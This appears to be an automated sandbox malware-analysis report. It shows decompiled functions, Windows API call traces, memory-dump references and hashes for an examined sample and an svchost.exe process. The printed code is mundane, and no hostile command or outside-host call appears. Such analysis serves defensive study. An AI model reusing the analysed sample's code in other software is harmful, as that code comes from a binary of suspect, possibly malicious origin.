                                                                                                                    • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                    • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                    • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                    0x00406597
                                                                                                                    0x00406598
                                                                                                                    0x004065a0
                                                                                                                    0x004065aa
                                                                                                                    0x004065ac
                                                                                                                    0x004065ac
                                                                                                                    0x004065bd

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                    • wcscat.MSVCRT ref: 004065B6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                    • String ID: _lng.ini
                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                    • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                    • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                    • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                    • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                    0x0040ac59
                                                                                                                    0x0040ac60
                                                                                                                    0x0040ac68
                                                                                                                    0x0040ac6d
                                                                                                                    0x0040ac75
                                                                                                                    0x0040ac7b
                                                                                                                    0x00000000
                                                                                                                    0x0040ac7b
                                                                                                                    0x0040ac6d
                                                                                                                    0x0040ac80

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                    • API String ID: 946536540-880857682
                                                                                                                    • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                    • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                    • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                    • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                    0x00406670
                                                                                                                    0x0040667a
                                                                                                                    0x00406680
                                                                                                                    0x00406686
                                                                                                                    0x0040668b
                                                                                                                    0x0040668d
                                                                                                                    0x00406693
                                                                                                                    0x00406699
                                                                                                                    0x0040669f
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066af
                                                                                                                    0x004066b9
                                                                                                                    0x004066c7
                                                                                                                    0x004066d9
                                                                                                                    0x004066c9
                                                                                                                    0x004066c9
                                                                                                                    0x004066cc
                                                                                                                    0x004066cf
                                                                                                                    0x004066d2
                                                                                                                    0x004066d5
                                                                                                                    0x004066d5
                                                                                                                    0x004066db
                                                                                                                    0x004066dd
                                                                                                                    0x004066e0
                                                                                                                    0x004066e8
                                                                                                                    0x004066fa
                                                                                                                    0x004066ea
                                                                                                                    0x004066ea
                                                                                                                    0x004066ed
                                                                                                                    0x004066f0
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x004066f6
                                                                                                                    0x004066fc
                                                                                                                    0x004066fe
                                                                                                                    0x00406701
                                                                                                                    0x00406709
                                                                                                                    0x0040671b
                                                                                                                    0x0040670b
                                                                                                                    0x0040670b
                                                                                                                    0x0040670e
                                                                                                                    0x00406711
                                                                                                                    0x00406714
                                                                                                                    0x00406717
                                                                                                                    0x00406717
                                                                                                                    0x0040671d
                                                                                                                    0x0040671f
                                                                                                                    0x00406722
                                                                                                                    0x0040672a
                                                                                                                    0x0040673c
                                                                                                                    0x0040672c
                                                                                                                    0x0040672c
                                                                                                                    0x0040672f
                                                                                                                    0x00406732
                                                                                                                    0x00406735
                                                                                                                    0x00406738
                                                                                                                    0x00406738
                                                                                                                    0x0040673f
                                                                                                                    0x00406745

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1860491036-0
                                                                                                                    • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                    • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                    • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                    • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                    0x004054ea
                                                                                                                    0x004054ec
                                                                                                                    0x004054f1
                                                                                                                    0x004054f4
                                                                                                                    0x004054f7
                                                                                                                    0x004054fa
                                                                                                                    0x004054fe
                                                                                                                    0x00405501
                                                                                                                    0x00405505
                                                                                                                    0x00405508
                                                                                                                    0x0040550b
                                                                                                                    0x0040551b
                                                                                                                    0x0040550d
                                                                                                                    0x0040550f
                                                                                                                    0x0040550f
                                                                                                                    0x00405521
                                                                                                                    0x00405527
                                                                                                                    0x0040552b
                                                                                                                    0x0040552e
                                                                                                                    0x0040553f
                                                                                                                    0x00405530
                                                                                                                    0x00405532
                                                                                                                    0x00405532
                                                                                                                    0x00405556
                                                                                                                    0x00405561
                                                                                                                    0x0040556e
                                                                                                                    0x00405571
                                                                                                                    0x00405578
                                                                                                                    0x0040557e

                                                                                                                    APIs
                                                                                                                    • wcslen.MSVCRT ref: 004054EC
                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                      • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                      • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                      • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                    • memcpy.MSVCRT ref: 00405556
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 726966127-0
                                                                                                                    • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                    • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                    • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                    • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                    0x00405adf
                                                                                                                    0x00405ae6
                                                                                                                    0x00405af5
                                                                                                                    0x00405af6
                                                                                                                    0x00405afb
                                                                                                                    0x00405b00
                                                                                                                    0x00405b0a
                                                                                                                    0x00405b18
                                                                                                                    0x00405b19
                                                                                                                    0x00405b1e
                                                                                                                    0x00405b2c
                                                                                                                    0x00405b2d
                                                                                                                    0x00405b36
                                                                                                                    0x00405b37
                                                                                                                    0x00405b3c
                                                                                                                    0x00405b4a
                                                                                                                    0x00405b4b
                                                                                                                    0x00405b54
                                                                                                                    0x00405b55
                                                                                                                    0x00405b5a
                                                                                                                    0x00405b68
                                                                                                                    0x00405b69
                                                                                                                    0x00405b72
                                                                                                                    0x00405b73
                                                                                                                    0x00405b7b
                                                                                                                    0x00000000
                                                                                                                    0x00405b7b
                                                                                                                    0x00405b80

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1033339047-0
                                                                                                                    • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                    • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                    • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                    • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Analysis Process: svchost.exe PID: 4496 Parent PID: 3472 svchost.exeCOMMON

                                                                                                                    Executed Functions

                                                                                                                    Function 07054490, Relevance: 1.8, APIs: 1, Instructions: 254libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 07054761
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.588157242.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: 51971d4e05b3d8c9d19ac2ef6a0e5af89bab364193ffb0dd36e54569f1139d05
                                                                                                                    • Instruction ID: 25c72c687998496f06c7ed97bca04bfe59e414dee31143df4c7ce68c1cb8a511
                                                                                                                    • Opcode Fuzzy Hash: 51971d4e05b3d8c9d19ac2ef6a0e5af89bab364193ffb0dd36e54569f1139d05
                                                                                                                    • Instruction Fuzzy Hash: FFA1B1B0904248CFCB11DFA4D484BDEBBF6AF88314F248A29E915EB394DB749C85CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011EBB08, Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: e0a278ad1aa4dd4a267285343a58dbe14b1ce41ec6fdae4c933bc19cb2136437
                                                                                                                    • Instruction ID: 8499e754d1ffaa71a5b7c2aac7dd4561666b89ccd951f4700c3eb2c40625c6d7
                                                                                                                    • Opcode Fuzzy Hash: e0a278ad1aa4dd4a267285343a58dbe14b1ce41ec6fdae4c933bc19cb2136437
                                                                                                                    • Instruction Fuzzy Hash: 817157B0A00B098FDB28DFA9D15879ABBF5FF88204F00892DD45AD7A54DB35E845CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011EB12C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011EDCCA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: cbc90f1a4740c6f8be2f7a7c89108a3ceca812b5f369776f6c454f313945ab18
                                                                                                                    • Instruction ID: 757e027bd11a29b5a6043003769408f26ab69b0af1720b970753c986823bdc5e
                                                                                                                    • Opcode Fuzzy Hash: cbc90f1a4740c6f8be2f7a7c89108a3ceca812b5f369776f6c454f313945ab18
                                                                                                                    • Instruction Fuzzy Hash: 7E51CCB0D00608AFDF18CFD9D984ADEBBF5BF48314F24862AE819AB210D7759845CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011EDBAD, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011EDCCA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 6f6bbe3bd439dcfe08711cf332ce0f78f84656fcc09b9ad071437a1bbdaecc35
                                                                                                                    • Instruction ID: 3d513ffee169b76fe1217228b3abd978f6494cfa783f6d592367587f0833f248
                                                                                                                    • Opcode Fuzzy Hash: 6f6bbe3bd439dcfe08711cf332ce0f78f84656fcc09b9ad071437a1bbdaecc35
                                                                                                                    • Instruction Fuzzy Hash: B451DDB1C00708AFDB18CFD9D984ADEBBF5BF48314F24862AE819AB250D7759845CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0705E61C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNELBASE(0000000E), ref: 0705E6FC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.588157242.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 30a203d94030e00c3c0c85942a966792d4da1ff8bd652960cec134f2493306e4
                                                                                                                    • Instruction ID: 725d40b861d5e4edecc35a04475734fd1b0da642652d3fefbfbd73abf7c4b6e5
                                                                                                                    • Opcode Fuzzy Hash: 30a203d94030e00c3c0c85942a966792d4da1ff8bd652960cec134f2493306e4
                                                                                                                    • Instruction Fuzzy Hash: B44167B1D00658DFDB24CFA9C9847DEBBF6BF48314F14862AD858AB240D7749942CF92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 07057F70, Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNELBASE(0000000E), ref: 0705E6FC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.588157242.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 8fd7a236b71e49ae246d8a50ab8f2b0015720cce5bdc8b16ea44c398bb5425dc
                                                                                                                    • Instruction ID: 83fa5136ddf59bf380320e6f02309ab35c84b766831c46ccd75efa9fa8de899a
                                                                                                                    • Opcode Fuzzy Hash: 8fd7a236b71e49ae246d8a50ab8f2b0015720cce5bdc8b16ea44c398bb5425dc
                                                                                                                    • Instruction Fuzzy Hash: 6C3177B0D00258DFCB24CFA9C88479EBBF2FB48354F148629E859AB350D774A941CF82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 070546C4, Relevance: 1.6, APIs: 1, Instructions: 80libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 07054761
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.588157242.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: 122c18d61b36a49bd0d35a7d04b495b03da692d161a3d272c98bfc09d02b2e4c
                                                                                                                    • Instruction ID: 929a957ef9ac57da37fe211ec65e687520d9d96ee3bdb7f369313867cf0e572b
                                                                                                                    • Opcode Fuzzy Hash: 122c18d61b36a49bd0d35a7d04b495b03da692d161a3d272c98bfc09d02b2e4c
                                                                                                                    • Instruction Fuzzy Hash: 4C31F2B4D00248DFDB14CF99D584BDEBBF5AF89318F14852AE418AB260DB746886CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 07054024, Relevance: 1.6, APIs: 1, Instructions: 78libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 07054761
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.588157242.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: bc3bc767882691853a8b48ec8fd120def2c838277451b094bd55b608311fd304
                                                                                                                    • Instruction ID: 08cf56682b92e59df1301e05a4c84023f4a59cab706660bd5dd46a4fcefe278b
                                                                                                                    • Opcode Fuzzy Hash: bc3bc767882691853a8b48ec8fd120def2c838277451b094bd55b608311fd304
                                                                                                                    • Instruction Fuzzy Hash: E43112B0D00248DFDB14CF99D584BDEBBF5AF89318F248529E818AB360DB746885CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011E5C6C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011E6CC6,?,?,?,?,?), ref: 011E6D87
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: eee22fafe39b6b9858cbb856ad9e56d9e7a6f83b5c2ad0db0b294def884610be
                                                                                                                    • Instruction ID: b3009d844b170bb0394dc2e3f34c2e7eaa1faf7944b604c87671fd10483f40b2
                                                                                                                    • Opcode Fuzzy Hash: eee22fafe39b6b9858cbb856ad9e56d9e7a6f83b5c2ad0db0b294def884610be
                                                                                                                    • Instruction Fuzzy Hash: E12116B5900608EFDB10CF99D988ADEBBF9FB48324F54841AE958A3310D374A944CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011E6CF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011E6CC6,?,?,?,?,?), ref: 011E6D87
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 3d2bc778c378cac37ca971e4fbdd37a4d2895a5e8c00e542547d0bbe55da46c4
                                                                                                                    • Instruction ID: 58b38017da9449e7030d1a9e961acbeca5f5b37805946da9b162ec701811f2b4
                                                                                                                    • Opcode Fuzzy Hash: 3d2bc778c378cac37ca971e4fbdd37a4d2895a5e8c00e542547d0bbe55da46c4
                                                                                                                    • Instruction Fuzzy Hash: CA21E6B5900608AFDB10CF99D984ADEBBF9FB48324F54841AE958B3350D378A944CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011EAFF0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011EBDC9,00000800,00000000,00000000), ref: 011EBFDA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
